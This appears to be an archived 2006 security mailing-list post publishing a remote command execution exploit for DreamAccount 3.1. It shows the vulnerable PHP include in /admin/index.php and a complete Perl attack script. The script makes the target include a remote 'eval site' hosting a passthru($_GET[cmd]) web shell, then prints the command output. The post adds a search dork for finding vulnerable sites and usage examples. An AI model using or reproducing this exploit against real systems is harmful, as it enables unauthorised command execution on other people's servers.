<<< Date Index >>>     <<< Thread Index >>>

DREAMACCOUNT V3.1 Remote Command Execution Exploit



----------------------------------------------------
DREAMACCOUNT V3.1 Command Execution Exploit         
----------------------------------------------------
Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)
Coded By Drago84(Exclusive Security Team)           
----------------------------------------------------
site of script:http://dreamcost.com                 
----------------------------------------------------
Vulnerable: DREAMACCOUNT V3.1                       
----------------------------------------------------
vulnerable file :                                    
------------------                                  
/admin/index.php                                    
----------------------------------------------------
vulnerable code:                                    
----------------------------------------------------
require($path . "setup.php");                       
require($path . "functions.php");                   
require($path . "payment_processing.inc.php");        
$path parameter File inclusion                      
----------------------------------------------------
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
print 
"\n=============================================================================\r\n";
print " * Dreamaccount Remote Command Execution  23/06/06 *\r\n";   
print 
"=============================================================================\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";
print " Into the Eval Site it must be:\n\n";
print " Exclusive <?php  passthru($_GET[cmd]); ?> /Exclusive";

if (@ARGV < 4)
{
print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ 
http://www.site.org/doc.jpg id\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}
my $dir=$ARGV[1];
my $host=$ARGV[0];
my $eval=$ARGV[2];
my $cmd=$ARGV[3];
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;
print "\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
print "\n\nResult of:".$cmd."\n";
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
printf $1;
$response->content;
print "\n";

} 
----------------------------------------------------------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Coded By  Drago84
E-mail:KARKOR23@xxxxxxxxxxx
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER
,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR 
AND ALL LEZR.COM Member